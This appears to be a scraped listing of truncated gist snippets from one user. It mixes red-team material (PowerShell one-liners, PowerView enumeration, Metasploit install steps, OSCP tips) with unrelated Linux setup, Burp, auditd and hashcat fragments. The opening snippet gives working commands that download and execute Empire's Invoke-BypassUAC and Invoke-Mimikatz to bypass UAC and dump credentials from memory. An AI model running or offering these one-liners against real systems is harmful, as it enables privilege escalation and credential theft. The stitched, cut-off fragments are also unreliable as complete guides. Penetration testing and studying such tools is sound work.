jivoi

# Description: 
#    Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

# Import Mimikatz Module to run further commands

jivoi

Minimal i3 Ubuntu 18.04

TL,DR

A fully fonctional and good-looking linux for less than 256mb of ram

Setting Up

Downloading and installing

Get the "mini.iso" image from archive.ubuntu.com

Legacy boot

Just flash an usb drive with it as follow.

sudo dd bs=4M if=mini.iso of=/dev/sd> conv=fdatasync && sync

jivoi

# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)
#   has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993

# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>

# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GoupName <GROUP> -Recurse

# get the effective set of users who can administer a server

jivoi

{
    "project_options":{
        "connections":{
            "hostname_resolution":[],
            "out_of_scope_requests":{
                "drop_all_out_of_scope":false,
                "exclude":[
                    {
                        "enabled":true,
                        "file":"logout",

jivoi

#!/bin/sh
java -jar -Xmx2g -Djava.awt.headless=true ~/BurpSuitePro/burpsuite_pro.jar http jerrygamblin.com 80  
cp *.html ~/BurpSuitePro/scan.html
wkhtmltopdf scan.html scan.pdf
curl -F file=@scan.pdf -F initial_comment="BurpProxy JerryGamblin.com Scan" -F channels=#burpreports -F token=(Your Token) https://slack.com/api/files.upload
rm *.html
rm *.pdf

jivoi

#      ___             ___ __      __
#     /   | __  ______/ (_) /_____/ /
#    / /| |/ / / / __  / / __/ __  / 
#   / ___ / /_/ / /_/ / / /_/ /_/ /  
#  /_/  |_\__,_/\__,_/_/\__/\__,_/   
#                                    
# Linux Audit Daemon - Best Practice Configuration 
# /etc/audit/audit.rules
#
# Compiled by Florian Roth

jivoi

Steps to install Metasploit on Windows 10 using the Windows Subsystem for Linux

1.) Enable Developer Mode
    C:\> reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock" /t REG_DWORD /f /v "AllowDevelopmentWithoutDevLicense" /d "1"

2.) Enable Windows Subsystem for Linux
    C:\> DISM /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux

3.) Reboot

jivoi

How to pass the OSCP

1. Recon
2. Find vuln
3. Exploit
4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

jivoi

hashcat (v3.30) starting in benchmark mode...
...

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: Tesla K80, 2047/11439 MB allocatable, 13MCU
* Device #2: Tesla K80, 2047/11439 MB allocatable, 13MCU
* Device #3: Tesla K80, 2047/11439 MB allocatable, 13MCU
* Device #4: Tesla K80, 2047/11439 MB allocatable, 13MCU
* Device #5: Tesla K80, 2047/11439 MB allocatable, 13MCU

jivoi

#!/bin/bash
python3 bot.py